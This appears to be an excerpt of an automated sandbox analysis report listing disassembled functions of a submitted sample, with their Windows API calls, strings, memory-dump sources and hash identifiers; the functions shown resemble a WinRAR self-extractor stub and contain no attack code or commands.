                                                                                                    • Instruction ID: df85b64624eaf8c49653e2ef43206481c997da8cc5ee8b305a20fbae6d779597
                                                                                                    • Opcode Fuzzy Hash: fca2e4654284c3899af02fd732df59017a96b04c8d746dd8421aad1f581c29c6
                                                                                                    • Instruction Fuzzy Hash: 8241C5B1D08348AAEB30E7709C86FEEB7AC9F04304F046555FA95B61C2D674BAC8C761
                                                                                                    Function 00E1B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
                                                                                                      • Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E1B610
                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00E1B637
                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00E1B650
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00E1B661
                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 00E1B66A
                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00E1B67E
                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00E1B694
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                    • String ID: LICENSEDLG
                                                                                                    • API String ID: 3214253823-2177901306
                                                                                                    • Opcode ID: 51dbdd8053dfb0350bfb56e25a294a7c913ecbffbfc8f4305e9952691eeb9daa
                                                                                                    • Instruction ID: e08a5b9f81b4768370f3b583978824f2f69402c97ea686c543473e24985daf3e
                                                                                                    • Opcode Fuzzy Hash: 51dbdd8053dfb0350bfb56e25a294a7c913ecbffbfc8f4305e9952691eeb9daa
                                                                                                    • Instruction Fuzzy Hash: F621E532604204BFD211AF77FD4AFBB3B6DEB56B85F011014F601B60A1CBA2A9499635
                                                                                                    Function 00E1FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,4BBE8E55,00000001,00000000,00000000,?,?,00E0AF6C,ROOT\CIMV2), ref: 00E1FD99
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00E0AF6C,ROOT\CIMV2), ref: 00E1FE14
                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00E1FE1F
                                                                                                    • _com_issue_error.COMSUPP ref: 00E1FE48
                                                                                                    • _com_issue_error.COMSUPP ref: 00E1FE52
                                                                                                    • GetLastError.KERNEL32(80070057,4BBE8E55,00000001,00000000,00000000,?,?,00E0AF6C,ROOT\CIMV2), ref: 00E1FE57
                                                                                                    • _com_issue_error.COMSUPP ref: 00E1FE6A
                                                                                                    • GetLastError.KERNEL32(00000000,?,?,00E0AF6C,ROOT\CIMV2), ref: 00E1FE80
                                                                                                    • _com_issue_error.COMSUPP ref: 00E1FE93
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                    • String ID:
                                                                                                    • API String ID: 1353541977-0
                                                                                                    • Opcode ID: 029120cf3cd88e59b1748a812a924a35513374e197170e1ee3164986d7176161
                                                                                                    • Instruction ID: f6afa4ecca403ae820c4f01a7835216c9ea75e5934949881facadce4e02c2871
                                                                                                    • Opcode Fuzzy Hash: 029120cf3cd88e59b1748a812a924a35513374e197170e1ee3164986d7176161
                                                                                                    • Instruction Fuzzy Hash: DA41F871A00219AFCB109F65DC49BEEBBE8EB44724F105239F905F7291D7349984CBE4
                                                                                                    Function 00E09382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E09387
                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00E093AA
                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00E093C9
                                                                                                      • Part of subcall function 00E0C29A: _wcslen.LIBCMT ref: 00E0C2A2
                                                                                                      • Part of subcall function 00E11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E0C116,00000000,.exe,?,?,00000800,?,?,?,00E18E3C), ref: 00E11FD1
                                                                                                    • _swprintf.LIBCMT ref: 00E09465
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00E094D4
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00E09514
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                    • String ID: rtmp%d
                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                    • Opcode ID: 7372d171d2d7af465a9f136013cd5d1ecedc9e214fa1ddaa0a75410e1a1abc6d
                                                                                                    • Instruction ID: 2e640fd0ef8504aea6f2e957da88a6b7c981b645d311ecbc0f2e96b41db5f55a
                                                                                                    • Opcode Fuzzy Hash: 7372d171d2d7af465a9f136013cd5d1ecedc9e214fa1ddaa0a75410e1a1abc6d
                                                                                                    • Instruction Fuzzy Hash: 364154B1900258A6DF21AFA1CC45EDE73BCEF45344F0458A5B649F3093DB388BC99B60
                                                                                                    Function 00E01100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: U$p$z
                                                                                                    • API String ID: 176396367-3999876168
                                                                                                    • Opcode ID: ad451484344a2c5bd3230ca798f37891d6633c9e6f605ebb48c7afa9b3979a32
                                                                                                    • Instruction ID: 025529ee7e44960707c79f1086fe0f52c6e488a5ba15bdb76846159cdd503367
                                                                                                    • Opcode Fuzzy Hash: ad451484344a2c5bd3230ca798f37891d6633c9e6f605ebb48c7afa9b3979a32
                                                                                                    • Instruction Fuzzy Hash: CD41D8719006699FCB219F789C099DF7BB8EF01350F040059FD45F7256DB74AE898BA1
                                                                                                    Function 00E19ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00E19EEE
                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00E19F44
                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00E19FDB
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00E19FE3
                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00E19FF9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$RectText
                                                                                                    • String ID: $RarHtmlClassName
                                                                                                    • API String ID: 3937224194-266247588
                                                                                                    • Opcode ID: 41bb1d263377bef9eb053d771da04d9863d0e2ee4c9e4ca49deba479cbab3b89
                                                                                                    • Instruction ID: dbb31464e685415b460fca9befd0b4cf451abf005c2daf7638936bb28ffcc558
                                                                                                    • Opcode Fuzzy Hash: 41bb1d263377bef9eb053d771da04d9863d0e2ee4c9e4ca49deba479cbab3b89
                                                                                                    • Instruction Fuzzy Hash: CB41FF32105310AFCB215F75AC48BABBBA8FF49785F045568F849BA053CB74DA89CB61
                                                                                                    Function 00E11218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __aulldiv.LIBCMT ref: 00E1122E
                                                                                                      • Part of subcall function 00E0B146: GetVersionExW.KERNEL32(?), ref: 00E0B16B
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00E11251
                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00E11263
                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00E11274
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E11284
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E11294
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00E112CF
                                                                                                    • __aullrem.LIBCMT ref: 00E11379
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1247370737-0
                                                                                                    • Opcode ID: 6b165fedf88ccc3fdab2ce3e1e9147c075609d8e31c03c1718015a2bfdff9951
                                                                                                    • Instruction ID: a209a5dd2250934684e1d2d0bf034b80fdbd6558f9c510e64afa3f176c4fb532
                                                                                                    • Opcode Fuzzy Hash: 6b165fedf88ccc3fdab2ce3e1e9147c075609d8e31c03c1718015a2bfdff9951
                                                                                                    • Instruction Fuzzy Hash: 734109B1508305AFC710DF65C8849ABBBF9FF88314F00992EF596D2650E738E649CB52
                                                                                                    Function 00E02210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 00E02536
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                      • Part of subcall function 00E105DA: _wcslen.LIBCMT ref: 00E105E0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                    • API String ID: 3053425827-2277559157
                                                                                                    • Opcode ID: abcf9d0524055003369af6555e6bde342b055a347e4a100a81c64e745497e2e0
                                                                                                    • Instruction ID: 7f1ce6a08698f557d89f07f0830eab1e3654342b264d9d851b97681f11fd01d6
                                                                                                    • Opcode Fuzzy Hash: abcf9d0524055003369af6555e6bde342b055a347e4a100a81c64e745497e2e0
                                                                                                    • Instruction Fuzzy Hash: 8EF106706043409BDB15DB24C4D9BEE77D99B94304F08666DEE8ABB2C3CB6489C5C762
                                                                                                    Function 00E19CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                    • API String ID: 176396367-3568243669
                                                                                                    • Opcode ID: 9c89580defa3df769baa6e08f2ad4e35e275bc023303455351f4f4900a2f8ee3
                                                                                                    • Instruction ID: 11749c42ec30045879fc6a00842b4bd43a89b872b7f9575dea3f447eb8b5d52e
                                                                                                    • Opcode Fuzzy Hash: 9c89580defa3df769baa6e08f2ad4e35e275bc023303455351f4f4900a2f8ee3
                                                                                                    • Instruction Fuzzy Hash: 54512C7674032395DB309A25E8317F673E0EFA1754F59241AF9C1BB1C2FB658CC18261
                                                                                                    Function 00E2F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00E2FE02,00000000,00000000,00000000,00000000,00000000,00E2529F), ref: 00E2F6CF
                                                                                                    • __fassign.LIBCMT ref: 00E2F74A
                                                                                                    • __fassign.LIBCMT ref: 00E2F765
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00E2F78B
                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,00E2FE02,00000000,?,?,?,?,?,?,?,?,?,00E2FE02,00000000), ref: 00E2F7AA
                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,00E2FE02,00000000,?,?,?,?,?,?,?,?,?,00E2FE02,00000000), ref: 00E2F7E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: eaadb2199378b971a99b5094c8819c00b8a485b1fbcc04e4baade0a8c5943c28
                                                                                                    • Instruction ID: 35331832bbfb9253dc18ced57c065d52847b663d2c169a9a98e9c424eba2a62b
                                                                                                    • Opcode Fuzzy Hash: eaadb2199378b971a99b5094c8819c00b8a485b1fbcc04e4baade0a8c5943c28
                                                                                                    • Instruction Fuzzy Hash: 9E5182B1D002599FCB14CFA8EC85AEEFBF4EF09300F14516AE555F7251E670AA45CBA0
                                                                                                    Function 00E1CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 00E1CE9D
                                                                                                      • Part of subcall function 00E0B690: _wcslen.LIBCMT ref: 00E0B696
                                                                                                    • _swprintf.LIBCMT ref: 00E1CED1
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                    • SetDlgItemTextW.USER32(?,00000066,00E4946A), ref: 00E1CEF1
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E1CF22
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E1CFFE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                                    • String ID: %s%s%u
                                                                                                    • API String ID: 689974011-1360425832
